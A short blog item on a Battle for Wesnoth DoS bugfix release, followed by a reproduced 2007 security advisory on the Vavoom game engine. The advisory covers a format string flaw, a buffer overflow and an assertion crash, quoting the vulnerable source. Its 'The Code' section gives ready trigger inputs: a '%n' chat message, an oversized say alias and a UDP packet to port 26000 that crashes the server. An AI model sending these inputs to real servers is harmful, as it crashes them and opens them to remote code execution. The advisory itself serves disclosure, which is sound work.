I didn't expect to blog twice in the same day regarding Linux gaming, yet anyhow... Battle for Wesnoth is a free turn based strategy game for personal computers released under the GNU General Public License. The Wesnoth team has released a DoS update, bring the stable release to v1.2.7. This is a bugfix release for 1.2.x and it is compatible with the other 1.2.x versions. "The main reason for this release was an important fix where an utf8 char at the wrong position in a chatmessage could crash other clients." This bug was filled as CVE-2007-3917.
#######################################################################
Luigi Auriemma
Application: Vavoom
http://www.vavoom-engine.com
Versions: Windows, DOS, *nix, *BSD and more
Platforms: <= 1.24
Bugs: A] Say format string
B] BroadcastPrintf buffer-overflow
C] "NewLen >= 0" assertion failed
Exploitation: remote, versus server
Date: 23 Aug 2007
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
Vavoom is an open source engine based on the GPLed Doom engine with
many interesting features.
#######################################################################
=======
2) Bugs
=======
--------------------
A] Say format string
--------------------
format string vulnerability exploitable through the sending of a chat
message, the BroadcastPrintf function is called passing a string
containing the name of the user plus his message without the proper
format argument.
from sv_main.cpp:
COMMAND(Say)
{
guard(COMMAND Say);
if (Source == SRC_Command)
{
#ifdef CLIENT
ForwardToServer();
#endif
return;
}
if (Args.Num() < 2)
return;
VStr Text = Player->PlayerName;
Text += ":";
for (int i = 1; i < Args.Num(); i++)
{
Text += " ";
Text += Args[i];
}
GLevelInfo->BroadcastPrintf(*Text);
GLevelInfo->StartSound(TVec(0, 0, 0), 0,
GSoundManager->GetSoundID("misc/chat"), 0, 1.0, 0);
unguard;
}
----------------------------------
B] BroadcastPrintf buffer-overflow
----------------------------------
buffer-overflow vulnerability located in the BroadcastPrintf function,
the steps for exploiting it are the same of the previous bug.
from p_thinker.cpp:
void VThinker::BroadcastPrintf(const char *s, ...)
{
guard(VThinker::BroadcastPrintf);
va_list v;
char buf[1024];
va_start(v, s);
vsprintf(buf, s, v);
va_end(v);
for (int i = 0; i < svs.max_clients; i++)
if (Level->Game->Players[i])
Level->Game->Players[i]->eventClientPrint(buf);
unguard;
}
---------------------------------
C] "NewLen >= 0" assertion failed
---------------------------------
a failed assert in the following function called, for example, when a
string is passed with an invalid size allows an attacker to terminate
the server.
from str.cpp:
void VStr::Resize(int NewLen)
{
guard(VStr::Resize);
check(NewLen >= 0);
...
#######################################################################
===========
3) The Code
===========
A]
send a chat message containing %n%n%n%n%s
B]
open the cfg file, for example vavoom\basev\doom2\config.cfg, and add
the following lines
alias bof "say aaa...(992_'a's)...aaa"
name "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
C]
send an UDP packet (port 26000) containing the following hex bytes:
80 02 ff 00
#######################################################################
======
4) Fix
======
I have sent a mail to the developer
#######################################################################